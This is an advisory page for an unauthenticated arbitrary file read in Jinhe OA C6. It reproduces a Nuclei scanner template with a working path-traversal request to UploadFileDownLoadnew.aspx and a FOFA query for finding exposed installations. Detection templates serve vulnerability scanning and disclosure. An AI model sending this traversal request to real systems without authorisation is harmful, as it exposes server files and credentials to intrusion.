jinhe-oa-c6-upload-lfi: Jinhe OA_C6_UploadFileDownLoadnew - Arbitrary File Read

日期: 2025-08-01 | 影响软件: Jinhe OA C6 | POC: 已公开

漏洞描述

There is an arbitrary file reading vulnerability in the UploadFileDownLoadnew.aspx interface of Jinhe OA C6. An unauthenticated attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., causing the website to be in Extremely unsafe state.

PoC代码[已公开]

id: jinhe-oa-c6-upload-lfi

info:
  name: Jinhe OA_C6_UploadFileDownLoadnew - Arbitrary File Read
  author: pussycat0x
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the UploadFileDownLoadnew.aspx interface of Jinhe OA C6. An unauthenticated attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., causing the website to be in Extremely unsafe state.
  reference:
    - https://github.com/wy876/POC/blob/main/%E9%87%91%E5%92%8COA_C6_UploadFileDownLoadnew%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="JHSoft.Web.AddMenu" || app="金和网络-金和OA"
  tags: jinhe-oa-c6,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/?FilePath=../Resource/JHFileConfig.ini"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "MaxFolderTotal=1"
          - "[JHFile]"
          - "FolderTotal=1"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210092642ad04f0e108e6fa84f6acbd66ed6a13ce810ce447cb7f6bbfcf0f730e0f1022100cd6cfc5ff7f67b11b850404f0ffb0f8f993f057528eeaf1f6c4eb16fde6d32f5:922c64590222798bb761d5b6d8e72950

相关漏洞推荐